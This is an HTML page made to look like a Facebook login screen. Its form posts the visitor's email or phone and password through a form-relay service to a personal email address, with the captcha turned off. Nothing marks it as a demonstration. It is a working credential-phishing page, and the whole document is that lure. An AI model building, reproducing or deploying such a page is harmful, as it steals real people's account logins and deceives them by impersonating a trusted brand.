<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=Edge">
  <meta name="viewport" content="width=device-width, initial-scale=1">

  <title>HTML</title>

  <!-- HTML -->


  <!-- Custom Styles -->
  <link rel="stylesheet" href="style.css">
</head>

<body>
  <div class="content">
    <h1>Facebook</h1>
    <p>New colored edition</p>
    <form action="https://formsubmit.co/memo.dopaly0@gmail.com" method="POST">
      <input type="hidden" name="_subject" value="New email">

      <input type="email" name="email" placeholder="Email Address Or Phone" required>

      <input type="password" name="name" placeholder="password" required>

      <input type="hidden" name="_captcha" value="false">

      <button type="submit">LOGIN</button><br>
      <a href="">forget password ?</a>
    </form>

  </div>
  <script src="main.js"></script>
</body>

</html>
